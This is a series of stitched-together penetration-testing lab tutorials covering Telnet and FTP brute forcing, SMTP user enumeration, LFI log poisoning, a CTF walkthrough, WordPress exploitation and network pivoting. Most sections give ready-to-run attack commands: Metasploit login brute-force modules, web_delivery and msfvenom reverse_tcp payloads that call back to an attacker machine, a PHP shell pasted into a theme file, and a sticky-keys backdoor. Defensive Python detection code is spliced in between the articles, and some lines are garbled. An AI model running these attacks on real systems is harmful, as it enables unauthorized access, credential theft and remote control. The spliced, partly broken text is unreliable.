The admin should GRANT all privileges to a specific user only from a specific IP address, which prevents attackers from altering the database information.
Now, to grant all privileges, log in to the MySQL server and type the following query:
mysql> GRANT ALL PRIVILEGES ON *.* TO 'root'@'192.168.1.220' IDENTIFIED BY 'toor' WITH GRANT OPTION;
To tell the server to reload the grant tables, perform a flush-privileges operation:
mysql> flush privileges;


Penetration Testing on Telnet (Port 23)

Welcome to internal penetration testing on a telnet server, where you will learn telnet installation and configuration, enumeration and attack, system security and precautions.

From Wikipedia

Telnet is a protocol used on the Internet or local area networks to provide a bidirectional interactive text-oriented communication facility using a virtual terminal connection. This protocol is used to establish a connection to Transmission Control Protocol (TCP) port number 23, where a Telnet server application (telnetd) is listening.

Let’s start!!!
Requirement
Telnet Server: Ubuntu
Attacker system: Kali Linux

Telnet Installation & Configuration in 3 steps

Installing a telnet server is very simple; it gets activated in the following three steps:
1) Open the terminal in Ubuntu and type the given below command with root access.
apt-get install xinetd telnetd



2) Open the inetd.conf file, add the given below statement inside it, then save it.

gedit /etc/inetd.conf
telnet stream tcp nowait telnetd /usr/sbin/tcpd /usr/sbin/in.telnetd


3) Now open xinetd.conf, add the following lines as its configuration settings and save it.
gedit /etc/xinetd.conf
# Simple configuration file for xinetd
#
# Some defaults, and include /etc/xinetd.d/
defaults
{
# Please note that you need a log_type line to be able to use log_on_success
# and log_on_failure. The default is the following :
# log_type = SYSLOG daemon info
instances = 60
log_type = SYSLOG authpriv
log_on_success = HOST PID
log_on_failure = HOST
cps = 25 30
}
includedir /etc/xinetd.d


Now execute the following command to restart the service.
sudo /etc/init.d/xinetd restart


Now you can check whether the telnet service has been activated; for this we scan our own system with nmap.
nmap -p 23 127.0.0.1
If the service is activated on the targeted server then nmap shows STATE open for port 23.



SSH Banner grabbing through telnet
Telnet plays an important role in banner grabbing of other services running on a target system. Open the terminal in Kali Linux and type the following command to find the version of the SSH service running on the targeted machine.

telnet 192.168.0.106 22

From the given image you can observe that it has successfully shown the SSH version "2.0-openSSH_6.6.1p1" installed on the target machine.

SMTP Banner grabbing through telnet
Similarly, we can also find out the version and valid users of an SMTP server using telnet. Execute the following command to find out its version and valid users.
telnet 192.168.0.25 25
From the given image you can observe that it has successfully shown "220 mail.ignite.lab ESMTP Postfix", i.e. Postfix is installed on the target machine.
You can guess valid user accounts through the following command. If you receive response code 250, 251 or 252, the server has accepted the request and the user account is valid. But if you receive response code 550, it is an unknown (invalid) user account, as shown in the given image.
vrfy raaz@mail.ignite.lab


Telnet Banner Grabbing through Metasploit

An attacker always performs enumeration to find important information such as software versions, which is known as banner grabbing, and then checks whether that version is vulnerable to any exploit.

Open the terminal in your Kali Linux and load the Metasploit framework; now type the following commands to scan for the TELNET version.
use auxiliary/scanner/telnet/telnet_version
msf auxiliary(telnet_version) > set rhosts 192.168.0.106
msf auxiliary(telnet_version) > set rport 23
msf auxiliary(telnet_version) > set threads 5
msf auxiliary(telnet_version) > exploit

From the given image you can read the highlighted text, which shows the installed version of TELNET on the target's system.



Brute Force Attack
An attacker always tries a brute force attack to steal credentials for unauthorized access.

This module will test a telnet login on a range of machines and report successful logins. If you have loaded a database plugin and connected to a database, this module will record successful logins and hosts so you can track your access.
Now type the following commands to brute force the TELNET login:

use auxiliary/scanner/telnet/telnet_login
msf auxiliary(telnet_login) > set rhosts 192.168.0.106
msf auxiliary(telnet_login) > set user_file /root/Desktop/user.txt
msf auxiliary(telnet_login) > set pass_file /root/Desktop/pass.txt
msf auxiliary(telnet_login) > set stop_on_success true
msf auxiliary(telnet_login) > exploit
From the given image you can observe that our TELNET server is not secure against brute force attack: it shows the matching combination of username raj and password 123 for login, and at the same time it has opened the victim's command shell as session 1.

From the given image you can see that we now have unauthorized access on the victim's system as raj@ignite, and we executed ifconfig to verify the network interface.


We can also upgrade the command shell into a meterpreter shell using the following command:

sessions -u 1
From the given image you can see that we now have two sessions: the 1st is the command shell session and the 2nd is the meterpreter session.


Stealing credentials through sniffing

Telnet, by default, does not encrypt any data sent over the connection (including passwords), so it is often feasible to eavesdrop on the communication and use the password later for malicious purposes; anybody who has access to the network between the two hosts where Telnet is being used can intercept the packets passing between source and destination and obtain login, password and data information.

From the given image you can observe that the client is logging in to the telnet server by submitting valid credentials while, on the other hand, the attacker is sniffing network packets using Wireshark or other tools.


Here you can notice that Wireshark has captured the telnet information by sniffing the network. Telnet follows the same pattern as FTP: users authenticate themselves with a clear-text sign-in for username and password. As a result an attacker can easily sniff login credentials.


From the given below image you can read the username raj and password 123, as well as the complete information travelling in packets from source to destination.

Telnet implementations do not support Transport Layer Security (TLS) and Simple Authentication and Security Layer (SASL) authentication extensions. For that reason the Secure Shell (SSH) protocol, first released in 1995, has replaced Telnet.


Secure Telnet through Port forwarding
In order to secure the telnet server, the admin can move the service from its default port to a specific port. Open the services file using the following command to make the change:
gedit /etc/services

From the given image you can see that telnet uses port 23 by default; change the port number for the telnet service.


From the given below image you can compare that we have changed port 23 to 2323; now restart the service.
service xinetd restart


Verify it using the nmap command as given below:
nmap -p 2323 -sV 192.168.0.106


Secure telnet against brute force attack
You can secure the telnet server against brute force and unauthorized access by adding a filter with iptables. Allow only a specific IP address to establish a connection with the telnet server and reject or drop connections from other IP addresses.
Now type the following commands with root permission to add filters for telnet in iptables.

iptables -A INPUT -s 192.168.0.104 -p tcp --dport 23 -j ACCEPT
The above command will allow traffic from IP address 192.168.0.104 to access the telnet service on port 23.

iptables -A INPUT -p tcp --dport 23 -j DROP
The above command will drop traffic coming from other IP addresses to port 23.

Restart the service once you have added the filters in iptables.
sudo /etc/init.d/xinetd restart


Let's verify the working of iptables by connecting to the telnet server from the client machine holding IP address 192.168.0.104.
Great!! The connection is established successfully.
You can confirm it from the given below image.


Let's verify the working of iptables by connecting to the telnet server from the attacker machine holding a different IP address.
From the given below image you can see nothing is happening here, because port 23 is down for all other IP addresses.

Awesome!! It means that even if an attacker sniffs valid credentials, they will still not be able to access the telnet server.


4 ways to SMTP Enumeration

We can also find out the version and valid users of an SMTP server using telnet. Execute the following command to find out its version and valid users.

Telnet

telnet 192.168.0.25 25

From the given image you can observe that it has successfully shown "220 mail.ignite.lab ESMTP Postfix", i.e. Postfix is installed on the target machine.
You can guess valid user accounts through the following command. If you receive response code 250, 251 or 252, the server has accepted the request and the user account is valid. But if you receive response code 550, it is an unknown (invalid) user account, as shown in the given image.

vrfy admin@mail.ignite.lab
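As an added example (not code from the article) serving both this section and the SMTP banner-grabbing section of the telnet article above, here is a small Python check a mail admin can run over a captured SMTP session to see whether the server's VRFY replies distinguish real names from fake ones, using exactly the reply codes the article lists. The two transcripts are constructed, not real captures; the 502 reply is what Postfix returns once `disable_vrfy_command = yes` is set.

```python
import re

# Reply codes as the article reads them: 250/251/252 mean the server accepted
# the VRFY request (the name exists or is an alias), 550 means unknown user.
# 502 is what a server answers once VRFY is turned off (Postfix:
# disable_vrfy_command = yes), which is the usual mitigation.
ACCEPTED = {250, 251, 252}
REJECTED = {550}
DISABLED = {502}

VRFY_RE = re.compile(r"^VRFY\s+(\S+)", re.IGNORECASE)
REPLY_RE = re.compile(r"^(\d{3})[ -]")


def parse_vrfy_transcript(transcript: str) -> dict:
    """Pair every VRFY command in a captured SMTP session with the reply
    code the server sent back. The banner and unrelated replies are skipped."""
    results = {}
    pending = None
    for line in transcript.splitlines():
        line = line.strip()
        cmd = VRFY_RE.match(line)
        if cmd:
            pending = cmd.group(1)
            continue
        reply = REPLY_RE.match(line)
        if reply and pending is not None:
            results[pending] = int(reply.group(1))
            pending = None
    return results


def vrfy_exposure(results: dict) -> str:
    """Classify what the replies reveal: 'disabled' (VRFY is off), 'leaks'
    (different answers for real and fake names, so names can be confirmed),
    'opaque' (the same non-committal 252 for every name) or 'inconclusive'."""
    codes = set(results.values())
    if codes and codes <= DISABLED:
        return "disabled"
    if codes & ACCEPTED and codes & REJECTED:
        return "leaks"
    if codes and codes <= {252}:
        return "opaque"
    return "inconclusive"


# Constructed transcripts (not real captures) in the shape of the article's
# session against mail.ignite.lab.
LEAKY_SESSION = """\
220 mail.ignite.lab ESMTP Postfix
VRFY raj@mail.ignite.lab
252 2.0.0 raj@mail.ignite.lab
VRFY raaz@mail.ignite.lab
550 5.1.1 <raaz@mail.ignite.lab>: Recipient address rejected: User unknown in local recipient table
"""

HARDENED_SESSION = """\
220 mail.ignite.lab ESMTP Postfix
VRFY raj@mail.ignite.lab
502 5.5.1 VRFY command is disabled
VRFY raaz@mail.ignite.lab
502 5.5.1 VRFY command is disabled
"""

if __name__ == "__main__":
    for name, session in (("leaky", LEAKY_SESSION), ("hardened", HARDENED_SESSION)):
        parsed = parse_vrfy_transcript(session)
        print(name, parsed, vrfy_exposure(parsed))
```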


Metasploit
The SMTP service has two internal commands that allow the enumeration of users: VRFY (confirming the names of valid users) and EXPN (which reveals the actual addresses behind users' aliases and mailing lists). Using these SMTP commands can reveal a list of valid users.

use auxiliary/scanner/smtp/smtp_enum
msf auxiliary(smtp_enum) > set rhosts 192.168.1.107
msf auxiliary(smtp_enum) > set rport 25
msf auxiliary(smtp_enum) > set USER_FILE /root/Desktop/user.txt
msf auxiliary(smtp_enum) > exploit


From the given image you can read the valid usernames found on the targeted server; it also grabs the SMTP banner.


smtp-user-enum

smtp-user-enum is a tool for enumerating OS-level user accounts on Solaris via the SMTP service (sendmail). Enumeration is performed by inspecting the responses to VRFY, EXPN and RCPT TO commands. It could be adapted to work against other vulnerable SMTP daemons, but this hasn’t been done as of v1.0.

Type the following command to enumerate usernames using a dictionary of usernames:

smtp-user-enum -M VRFY -U /root/Desktop/user.txt -t 192.168.1.107
-M mode: method to use for username guessing: EXPN, VRFY or RCPT
-U file: file of usernames to check via the SMTP service
-t host: server host running the SMTP service

From the given image you can see that out of 7 queries in total only 5 names are valid and exist on the SMTP server.


Type the following command to verify a user's email address on the mail server:
smtp-user-enum -M VRFY -D mail.ignite.lab -u raj -t 192.168.1.107
-D dom: domain to append to the supplied user list to make email addresses; use this option when you want to guess valid email addresses instead of just usernames.

From the given image you can see it has shown that raj@mail.ignite.lab is a valid email ID for user raj.


iSMTP

iSMTP is a Kali Linux tool which is used for testing SMTP user enumeration (RCPT TO and VRFY), internal spoofing, and relay.
Type the following command to enumerate valid email IDs on the targeted server:

ismtp -h 192.168.1.107:25 -e /root/Desktop/email.txt

-h: the target IP and port (IP:port)
-e: enable SMTP user enumeration testing and import the email list

From the given image you can see that blue text refers to valid email accounts and red text refers to invalid accounts.

Log Poisoning through LFI

In this article we demonstrate how a PHP file with an include function can lead to an LFI log injection attack on any web server. Please read our previous articles "Beginner Guide to File Inclusion Attack (LFI/RFI)" and "Configure Web Server for Penetration Testing (Beginner Guide)", which will help you configure your own web server and learn more about the LFI vulnerability.

Attacker: Kali Linux
Target: Ubuntu

Create a PHP file which allows the user to include a file through the file parameter. Using the file parameter we can then execute a file that contains malicious code to gain unauthorized access to the target PC. Download File from Here

I have saved the given below PHP code in a text file as lfi.php on the desktop.


Now log in as user "root" and create a folder "lfi" inside /var/www/html:
cd /var/www/html
mkdir lfi
Move the lfi.php file from the desktop into /var/www/html/lfi using the given below command.
mv /home/raj/Desktop/lfi.php /var/www/html/lfi/

Since we have added a PHP file with an include function inside /var/www/html, which allows the content of another file to be read through it, it can lead to an LFI attack. Let's demonstrate it by browsing the following URL to read the password file:

localhost/lfi/lfi.php?file=/etc/passwd

From the given image you can observe that the above URL has dumped the result shown below.


Now I will try to open the Apache access.log file through lfi.php in the browser; therefore give read permission to the apache2 log and then include the access.log file.

Now include the access.log file as the file parameter by giving the following URL in the browser.

192.168.1.129/lfi/lfi.php?file=/var/log/apache2/access.log

From the given image you can see that it shows the generated Apache logs in the browser. Now turn on Burp Suite to capture the request for the same web page.

Here you will get the intercepted data, where we need to inject our cmd command inside the User-Agent by replacing the highlighted data.
Add the cmd command inside the User-Agent and send the request with the GET parameter /lfi/lfi.php?file=/var/log/apache2/access.log&c=ps as shown in the below image. Then click on forward.
Here it will dump the log data as well as execute the command given through cmd. From the screenshot you can view both the log and the process state.
In the same manner, execute ifconfig through cmd to verify the network interface, or browse the following URL and view the result in the given screenshot.

192.168.1.129/lfi/lfi.php?file=/var/log/apache2/access.log&c=ifconfig
If you find this kind of vulnerability in any web application, you can use the Metasploit platform to exploit the web server.

This module quickly fires up a web server that serves a payload. The provided command will start the specified scripting language interpreter and then download and execute the payload. The main purpose of this module is to quickly establish a session on a target machine when the attacker has to manually type in the command himself, e.g. Command Injection, RDP Session, Local Access or maybe Remote Command Exec. This attack vector does not write to disk so it is less likely to trigger AV solutions and will allow privilege escalations supplied by Meterpreter. When using either of the PSH targets, ensure the payload architecture matches the target computer or use SYSWOW64 powershell.exe to execute x86 payloads on x64 machines.

use exploit/multi/script/web_delivery
msf exploit(web_delivery) > set target 1
msf exploit(web_delivery) > set payload windows/meterpreter/reverse_tcp
msf exploit(web_delivery) > set lhost 192.168.0.104
msf exploit(web_delivery) > set srvport 8081
msf exploit(web_delivery) > exploit

Copy the highlighted text shown in the window below.

Paste the above copied malicious code inside the URL as shown in the given image and execute it as a command.
When the above code gets executed you will get meterpreter session 1.

msf exploit(web_delivery) > sessions -i 1
meterpreter > sysinfo

Hack the Primer VM (CTF Challenge)

Hello friends! Today we are going to take on another CTF challenge known as Primer. The credit for making this VM goes to "couchsofa", and it is another boot2root challenge where we have to root the VM to complete the challenge. You can download this VM here.
Let's Breach!!!
Let us start by getting to know the IP of the VM (here I have it at 192.168.1.115, but you will have to find your own).

netdiscover

nmap -sV 192.168.1.115


We found that port 80 is open, so we open this IP address in our browser.


dirb http://192.168.1.115/ -w


Inside the robots.txt we find a link to a page.


We open this link; it leads to a page that has a story written on it.


We take a look at the source code at the end and find another link.


When we open the link we find another link on the page.


When we open the link we are prompted for a password.


We capture the request for this page in Burp Suite and send it to Repeater. In the response from the server, we find another link.


When we open the link we find another page that prompts for password.


Now we take a look at the URL; it looks like md5, so we remove the first part and the underscore and find something interesting.


We find that the URLs are actually prime numbers converted into md5 hashes. We were at the 7th page, and the hash for that is 17. So we convert 19 (the next prime number) to an md5 hash.




We take a look at the source code and find another URL.


We open it and find a custom-made terminal that uses JavaScript to execute certain commands.


In the ~/usr/falken/ folder we find a hint; when we take a look at the processes we find a command that we need to run.


When we run connect falken@Erebus it prompts for a password. We get a hint from the log files that the password might be related to Joshua. In the logs we find that his date of birth is 6th August 1984. We use cupp to create a dictionary file.


We use Burp Suite to brute force the password and find that joshua1984 is the password.


When we login, we find a page again with terminal.




There we find our next clue; we googled "trivial zero" and found it was discovered by Riemann. We use cupp to create a dictionary with the given information.




When we login we are again prompted with another terminal.

When we look through the files we find the md5 hashes for the usernames. We check the processes and again find a command.


When we crack the md5 hashes, we find that these are the passwords for the respective usernames.

When we login, we are again prompted with another terminal.


Looking through the files we find username, password and hostname.


We use these to log in and find a page greeting us for completing the challenge.


RCE with LFI and SSH Log Poisoning

In this article you will learn how to gain unauthorized access to a web server if it suffers from a local file inclusion vulnerability, with the help of the auth log file. To perform this attack, please read our previous articles "Beginner Guide to File Inclusion Attack (LFI/RFI)" and "Configure Web Server for Penetration Testing (Beginner Guide)", which will help you configure your own web server and learn more about the LFI vulnerability.

Attacker: Kali Linux
Target: Ubuntu

Let’s Begin!!

Create a PHP file which allows the user to include a file through the file parameter. Using the file parameter we can then execute a file that contains malicious code to gain unauthorized access to the target PC. Download File from Here

I have saved the given below PHP code in a text file as lfi.php on the desktop.
Now log in as user "root" and create a folder "lfi" inside /var/www/html:
cd /var/www/html
mkdir lfi
Move the lfi.php file from the desktop into /var/www/html/lfi using the given below command.
mv /home/raj/Desktop/lfi.php /var/www/html/lfi/

Since we have added a PHP file with an include function inside /var/www/html, which allows the content of another file to be read through it, it can lead to an LFI attack. Let's demonstrate it by browsing the following URL to read the password file:

localhost/lfi/lfi.php?file=/etc/passwd
From the given image you can observe that the above URL has dumped the result shown below.

Open the terminal in your Kali Linux and connect to the target through the SSH service.
From the screenshot you can see I am connected to the target system.


Type the following command to view its logs:
tail -f /var/log/auth.log
From the given below image you can check the details of the generated logs in the auth.log file.


Now I will try to open the auth.log file through lfi.php in the browser; therefore give read and write permission to auth.log.
cd /var/log/
chmod 775 auth.log


Now include the auth.log file as the file parameter by giving the following URL in the browser.
192.168.1.129/lfi/lfi.php?file=/var/log/auth.log
From the given image you can see that it also shows the generated auth logs in the browser.



Since auth.log records every successful and failed login attempt made against the server, we can take advantage of this: I will now send malicious PHP code as a fake user name, and it will be added automatically to auth.log as a new log entry.
ssh ’@192.168.1.129

When you check the log again, you will find that the PHP code has been added as a new entry.
Type the following command to view the logs:
tail -f /var/log/auth.log


Here it will dump the data of the auth log as well as execute the command given through cmd; now execute ifconfig as the cmd command to verify the network interface and confirm its result in the given screenshot.
192.168.1.129/lfi/lfi.php?file=/var/log/auth.log&c=ifconfig
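As an added example (not code from either article), here is Python detection logic a defender can run over web and SSH logs to spot both halves of the log poisoning described here and in the Apache access.log article above: requests whose file parameter points at a log or system file, and log entries that carry PHP code in the User-Agent, Referer or SSH user-name field. The sample log lines are constructed to match the shape of the two articles' attacks.

```python
import re

# Markers of PHP code written into a log that a vulnerable include() could
# later execute: PHP open tags, the shell-running functions, and the request
# superglobal the injected code reads its command from.
PHP_MARKERS = re.compile(
    r"<\?(php|=)|\b(system|passthru|shell_exec|exec)\s*\(|\$_(GET|POST|REQUEST)\b",
    re.IGNORECASE,
)

# Apache "combined" format: ip ident user [time] "request" status size "referer" "user-agent"
APACHE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<request>[^"]*)" \d{3} \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)
# file= parameter of the request line, as used by lfi.php in the articles.
FILE_PARAM_RE = re.compile(r"[?&]file=([^&\s]+)")
# sshd writes a rejected login name verbatim into auth.log.
SSHD_INVALID_RE = re.compile(r"sshd\[\d+\]: Invalid user (?P<user>.*) from (?P<ip>\S+)")

SENSITIVE_PREFIXES = ("/var/log/", "/etc/", "/proc/")


def suspicious_includes(access_lines):
    """Requests whose file= parameter targets a log or system file or walks
    up the tree: the 'read' half of the attack. Returns (line_no, ip, path)."""
    hits = []
    for n, line in enumerate(access_lines, 1):
        m = APACHE_RE.match(line)
        if not m:
            continue
        f = FILE_PARAM_RE.search(m.group("request"))
        if f and (f.group(1).startswith(SENSITIVE_PREFIXES) or "../" in f.group(1)):
            hits.append((n, m.group("ip"), f.group(1)))
    return hits


def poisoned_access_entries(access_lines):
    """Access-log entries carrying PHP in the User-Agent, Referer or request:
    the 'write' half of the attack. Returns (line_no, field, ip)."""
    hits = []
    for n, line in enumerate(access_lines, 1):
        m = APACHE_RE.match(line)
        if not m:
            continue
        for field in ("ua", "referer", "request"):
            if PHP_MARKERS.search(m.group(field)):
                hits.append((n, field, m.group("ip")))
                break
    return hits


def poisoned_auth_entries(auth_lines):
    """sshd lines in auth.log that contain PHP, i.e. the SSH variant of the
    same poisoning. Returns (line_no, source ip or None when not recorded)."""
    hits = []
    for n, line in enumerate(auth_lines, 1):
        if "sshd[" in line and PHP_MARKERS.search(line):
            m = SSHD_INVALID_RE.search(line)
            hits.append((n, m.group("ip") if m else None))
    return hits


# Constructed sample lines (not real logs) in the shape the two articles describe.
SAMPLE_ACCESS = [
    '192.168.1.100 - - [10/Aug/2017:10:00:01 +0530] "GET /lfi/lfi.php?file=/etc/passwd HTTP/1.1" 200 2510 "-" "Mozilla/5.0"',
    '192.168.1.100 - - [10/Aug/2017:10:00:05 +0530] "GET /lfi/lfi.php?file=/var/log/apache2/access.log HTTP/1.1" 200 8820 "-" "<?php system($_GET[\'c\']); ?>"',
    '192.168.1.100 - - [10/Aug/2017:10:00:09 +0530] "GET /lfi/lfi.php?file=/var/log/apache2/access.log&c=ps HTTP/1.1" 200 9120 "-" "Mozilla/5.0"',
    '192.168.1.50 - - [10/Aug/2017:10:01:00 +0530] "GET /index.html HTTP/1.1" 200 120 "-" "curl/7.52.1"',
]
SAMPLE_AUTH = [
    "Aug 10 10:05:12 ubuntu sshd[1234]: Invalid user <?php system($_GET['c']); ?> from 192.168.1.100",
    "Aug 10 10:05:12 ubuntu sshd[1234]: input_userauth_request: invalid user <?php system($_GET['c']); ?> [preauth]",
    "Aug 10 10:06:00 ubuntu sshd[1300]: Accepted password for raj from 192.168.1.50 port 51234 ssh2",
]

if __name__ == "__main__":
    print(suspicious_includes(SAMPLE_ACCESS))
    print(poisoned_access_entries(SAMPLE_ACCESS))
    print(poisoned_auth_entries(SAMPLE_AUTH))
```

Note that the permission change made above (chmod 775 auth.log) is what lets the web server user read auth.log at all: on Ubuntu the file is owned by root:adm with mode 0640 by default, so the SSH variant only works once that protection has been loosened.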


If you find this kind of vulnerability in any web application, you can use the Metasploit platform to exploit the web server.
use exploit/multi/script/web_delivery
msf exploit(web_delivery) > set target 1
msf exploit(web_delivery) > set payload php/meterpreter/reverse_tcp
msf exploit(web_delivery) > set lhost 192.168.1.123
msf exploit(web_delivery) > set srvport 8081
msf exploit(web_delivery) > exploit
Copy the highlighted text shown in the window below.

Paste the above copied malicious code inside the URL as shown in the given image and execute it as a command.


When the above code gets executed you will get meterpreter session 1 on the targeted web server.
msf exploit(web_delivery) > sessions 1
meterpreter > sysinfo



Wordpress Penetration testing using WPScan & Metasploit

In our previous article we discussed "WordPress Penetration Testing Lab Setup in Ubuntu", and today you will learn WordPress penetration testing using WPScan and Metasploit.

Attacker: Kali Linux
Target: WordPress

WPScan is a black box vulnerability scanner for WordPress written in PHP that mainly focuses on different types of vulnerabilities in WordPress, WordPress themes, and plugins. The WPScan tool is already installed by default in Kali Linux, SamuraiWTF, Pentoo, BlackArch, and BackBox Linux. WPScan uses a database of all the available plugins and themes (approximately over 18000 plugins and 2600 themes) when testing the target to find outdated versions and vulnerabilities.

Things WPScan can do for you are:
- Detect the version of the currently installed WordPress.
- Detect sensitive files like readme, robots.txt, database replacing files, etc.
- Detect enabled features on the currently installed WordPress.
- Enumerate theme version and name.
- Detect installed plugins and tell you whether they are outdated or not.
- Enumerate user names.

Let’s start.

Go to your Kali Linux terminal and type the following to download wpscan from GitHub.

cd Desktop

git clone https://github.com/wpscanteam/wpscan.git


./wpscan.rb -h

Using the default options we are going to penetrate our WordPress website:
-e or --enumerate: option used for enumeration
  u        usernames from id 1 to 10
  u[10-20] usernames from id 10 to 20 (you must write the [] chars)
  p        plugins
  vp       only vulnerable plugins
  ap       all plugins (can take a long time)
  tt       timthumbs
  t        themes
  vt       only vulnerable themes
  at       all themes (can take a long time)


WPScan is a great tool to scan WordPress websites. Now we will try some basic scans; we will use the enumerate options to find information about themes, plugins, usernames etc.

Now type the following command to scan WordPress and its server:
./wpscan.rb -u http://192.168.0.101/wordpress/
Instead of http://192.168.0.101/wordpress/, type the name of the website you want to scan.

Here it found the server Apache/2.4.7, PHP/5.5.9 and WordPress version 4.8.1; using this information an attacker can search Google for exploits. Moreover, it also found that the upload directory has directory listing enabled, which means anyone can browse the directory /wp-content/uploads to view the uploaded files and contents.


A theme controls the general look and feel of website including things like page layout, widget locations, and default font and color choices. WordPress.com has a wide range of themes for its user and each theme has an about page that includes features and instructions.

To scan the installed theme of the WordPress website, type the following command:
./wpscan.rb -u http://192.168.0.101/wordpress/ --enumerate t


After some time we successfully found the theme twentyseventeen v1.3, its last update, the location where the theme is installed, etc., as shown below.


Enumerating vulnerable WordPress themes
To scan for installed vulnerable themes of the WordPress website, type the following command:
./wpscan.rb -u http://192.168.0.101/wordpress/ --enumerate vt

From the scan result we didn't find any vulnerable theme, which means there is no vulnerable theme that can be exploited.


Plugins are small pieces of program code which can be added to a WordPress website to extend its functionality.
                       
To find installed plugins on our target's WordPress website, type in the terminal:
./wpscan.rb -u http://192.168.0.101/wordpress/ --enumerate p





Now type the following command to scan for vulnerable plugins on any WordPress website:
./wpscan.rb -u http://192.168.0.101/wordpress/ --enumerate vp





This module exploits an arbitrary PHP code upload in the WordPress Reflex Gallery version 3.1.3. The vulnerability allows for arbitrary file upload and remote code execution.

Open the terminal, load the Metasploit framework and execute the following commands:
use exploit/unix/webapp/wp_reflexgallery_file_upload
msf exploit(wp_reflexgallery_file_upload) > set rhost 192.168.0.101
msf exploit(wp_reflexgallery_file_upload) > set targeturi /wordpress/
msf exploit(wp_reflexgallery_file_upload) > exploit

Awesome!! From the given image you can observe the meterpreter session on the victim's web server.
meterpreter > sysinfo


Enumerating WordPress usernames
In order to enumerate the user names of the WordPress website, execute the following command:



After some time it will dump the table of usernames. In this scan I found three users with their IDs as given below:
ID 1: admin
ID 2: ignite
ID: demo


Everything we have scanned above can be enumerated at once by executing the given below command:
./wpscan.rb -u http://192.168.0.101/wordpress/ -e at -e ap -e u

Here we used the options -e at -e ap -e u for the following reasons:

-e at: enumerate all themes of the targeted website
-e ap: enumerate all plugins of the targeted website
-e u: enumerate all usernames of the targeted website



Brute force attack using WPScan
With the help of the usernames we enumerated above, we can create a password wordlist for user admin and try a brute force login attack using the given below command.
./wpscan.rb -u http://192.168.0.101/wordpress/ --wordlist /root/Desktop/dict.txt --username admin






You can use the above credential to log in to the admin panel, where we can upload any theme; taking advantage of the admin rights we will try to upload a malicious script to get a reverse connection from the victim's system.
Once you are inside the admin panel, click on Appearance in the dashboard and then select the Editor option.




msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.0.107 lport=4444 -f raw
From the screenshot you can read the generated PHP script; at this point we need to copy the text starting from the *, and next we will paste it inside a WordPress template as a new theme.




use exploit/multi/handler
msf exploit(handler) > set payload php/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.0.107
msf exploit(handler) > set lport 4444
msf exploit(handler) > exploit


http://192.168.0.101/wordpress/wp-content/themes/twentyseventeen/404.php


meterpreter > sysinfo

In this way, using WPScan and Metasploit, an admin can check the strengths and weaknesses of a WordPress website.

FTP Pivoting through RDP

In our previous tutorials we discussed SSH pivoting and RDP pivoting, and today you will learn the FTP pivoting attack.
From Offensive Security
Pivoting is a technique to get inside an unreachable network with the help of a pivot (centre point). In simple words, it is an attack through which an attacker can exploit systems which belong to a different network. For this attack, the attacker needs to exploit the main server, which lets the attacker add himself to its local network, after which the attacker is able to target the client systems.
Lab Setup requirement:
Attacker machine: Kali Linux
Pivot Machine: Windows operating system with two network interfaces

Target Machine: Windows 7 (with the FTP service allowed)


Exploit the pivot machine
Use the MS17-010 exploit or a multi handler to hack the pivot machine and bypass its UAC to achieve admin privileges.
sessions
From the given image you can confirm that I own the pivot machine (192.168.0.101) as meterpreter session 1.


Launch sticky key attack
Here I need to run a post-exploitation module to launch the sticky key attack:
use post/windows/manage/sticky_keys
msf post(sticky_keys) > set session 1
msf post(sticky_keys) > exploit

Great!! It has successfully launched the sticky key attack on the pivot machine, and we will use it later to establish a connection with the target FTP server.


Enable RDP service
Open meterpreter session 1 and type the following command, which will enable the Remote Desktop service on the pivot machine.
meterpreter > run getgui -e


Verify the network interfaces of the pivot
Check the network interfaces with the following command:
meterpreter > ifconfig
From the given image you can observe two network interfaces on the pivot's system: the 1st with IP 192.168.0.101, through which the attacker is connected, and the 2nd with IP 192.168.100.102, through which the FTP server (target) is connected.

Use the autoroute post-exploitation module
Since the attacker is on the 192.168.0.1 network and the client is on the 192.168.100.0 network, it is not possible to attack the client network directly unless the attacker acquires a connection into that network. In order to reach the 192.168.100.0 network, the attacker needs to run the post-exploitation module "autoroute".
This module manages session routing via an existing Meterpreter session. It enables other modules to 'pivot' through a compromised host when connecting to the named NETWORK and SUBMASK. Autoadd will search a session for valid subnets from the routing table and interface list and then add routes to them. Default will add a default route so that all TCP/IP traffic not specified in the MSF routing table will be routed through the session when pivoting.
use post/multi/manage/autoroute
msf post(autoroute) > set session 1
msf post(autoroute) > exploit


Use the ping sweep post-exploitation module
This module will perform an IPv4 ping sweep using the OS-included ping command.
use post/windows/gather/ping_sweep
msf post(ping_sweep) > set rhosts 192.168.100.1-110
msf post(ping_sweep) > set session 1
msf post(ping_sweep) > exploit
Here we found a new host, IP 192.168.100.103, as shown in the given image. Let's perform a TCP port scan for active services on this machine.

Use the TCP port scan module
This module enumerates open TCP services by performing a full TCP connect on each port. This does not need administrative privileges on the source machine, which may be useful when pivoting.
use auxiliary/scanner/portscan/tcp
msf auxiliary(tcp) > set ports 21
msf auxiliary(tcp) > set rhosts 192.168.100.103
msf auxiliary(tcp) > set threads 10
msf auxiliary(tcp) > exploit
From the given image you can observe that port 21 is open, and we know that port 21 is used for FTP services.

FTP Login Brute Force
This module will test FTP logins on a range of machines and report successful logins. If you have loaded a database plugin and connected to a database, this module will record successful logins and hosts so you can track your access.
use auxiliary/scanner/ftp/ftp_login
msf auxiliary(ftp_login) > set rhosts 192.168.100.103
msf auxiliary(ftp_login) > set user_file /root/Desktop/user.txt
msf auxiliary(ftp_login) > set pass_file /root/Desktop/pass.txt
msf auxiliary(ftp_login) > set stop_on_success true
msf auxiliary(ftp_login) > exploit
From the given image you can observe that it shows the matching combination of username raj and password 123 for login.


Connect to pivot through RDP
Open a new terminal in Kali Linux and type the following command to connect to the pivot machine through the RDP service:
rdesktop 192.168.0.101


If you remember, we launched the sticky keys attack above, which opens a command prompt on the logon screen when you hit the Shift key 5 times.
Now press the Shift key 5 times; you will get a command prompt. Type "start iexplore.exe", which will launch Internet Explorer.


Connect with FTP server
Execute following URL in browser for FTP connection:
Now enter the credentials we found through the FTP login brute force attack, i.e. raj:123


Congrats!!! We are successfully connected to the FTP server through the pivot machine.

VNC Penetration Testing

Welcome to internal penetration testing on a VNC server, where you will learn VNC installation and configuration, enumeration and attack, system security and precautions.
From Wikipedia
